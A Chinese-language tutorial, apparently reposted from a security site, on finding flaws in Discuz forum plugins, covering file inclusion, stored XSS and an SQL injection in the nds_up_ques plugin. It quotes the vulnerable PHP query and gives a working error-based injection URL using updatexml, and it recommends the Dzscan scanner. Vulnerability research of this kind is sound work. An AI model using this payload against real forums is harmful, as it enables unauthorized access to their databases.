Disucz 插件漏洞挖掘
(2)任意文件包含 某积分商城插件 #漏洞文件 dc_mall.inc.php #包含测试 (3)XSS 某活动插件 #漏洞文件 event_list.inc.php //这些参数只是经过了转义,但是并没有将html标签实体化 //导致这里直接插入数据库,最后在后台输出将会导致存储xss 5.漏洞Exp的构造这里以 nds_up_ques 插件作为第一个例子,其存在一个sql注入漏洞 在nds_ques_viewanswer.inc.php文件中,首先,通过该文件的文件得知我们可以通过 http://www.discuz.net/plugin.php?id=nds_up_ques:nds_ques_viewanswer 这样的url去调用到这个文件; ?然后下面我们来看其中的代码: //忽略一点无关紧要的代码 $query = DB::query ( " SELECT * FROM " . DB::table ( 'ques_user' ) . " WHERE `topicid`='$topicid' " . $wherestr . " ?ORDER by $orderby $imes LIMIT $start_limit,$perpage" ); //这里可以看到把orderby和imes直接带入查询了,导致了sql注入 那么最终我们的exp就是: ?http://www.discuz.net/plugin.php?id=nds_up_ques:nds_ques_viewanswer&&srchtxt=1&orderby=dateline and 1=(updatexml(1,concat(0x27,version()),1))-- 工具推荐:Dzscan(dzscan.org) Discuz扫描器,完全针对国产Disucz论坛进行开发的扫描器,深度挖掘存在的漏洞,并且有一个正在长期维护的漏洞库。6.参考《Discuz!插件开发文档》 《CoNd0r@CodeScan》 (编辑:瑞安网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |